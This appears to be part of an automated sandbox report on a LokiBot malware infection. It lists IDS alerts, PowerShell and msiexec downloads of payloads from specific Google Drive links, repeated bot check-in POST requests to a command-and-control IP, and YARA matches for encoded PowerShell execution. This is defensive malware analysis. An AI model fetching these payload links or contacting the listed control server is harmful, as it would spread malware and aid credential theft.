                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 137.184.191.215:80
                Source: Joe Sandbox ViewIP Address: 137.184.191.215 137.184.191.215
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49738 -> 142.250.185.206:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknownHTTP traffic detected: POST /index.php/039 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 589BD15EContent-Length: 176Connection: close
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA4857B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA48576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA484CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: msiexec.exe, 00000008.00000002.3013626741.0000000008780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAbP
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAbXR%l(
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Db
                Source: msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1nqjXMkuy0HQzk_iGcoAJbDrbsZjAvxAb&export=download
                Source: msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/pb
                Source: powershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA47507000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA4859D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA4859D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000001.00000002.1845270492.000001CA46DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA4859D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49739 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_4348.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 4348, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
